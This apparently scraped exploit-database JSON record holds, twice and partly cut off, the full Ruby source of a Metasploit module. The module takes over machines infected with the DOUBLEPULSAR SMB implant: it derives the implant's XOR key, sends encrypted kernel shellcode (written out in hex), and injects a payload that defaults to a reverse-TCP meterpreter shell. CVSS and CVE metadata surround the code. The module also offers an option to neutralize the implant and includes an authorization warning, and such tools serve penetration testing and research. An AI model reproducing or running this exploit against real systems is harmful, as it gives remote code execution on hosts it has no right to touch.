Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-27] #"}, "lastseen": "2021-09-26T22:18:45", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "4f2f981069e569e37528cda4fab18437", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-28T06:16:50", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-28T06:16:50", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-28T06:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n 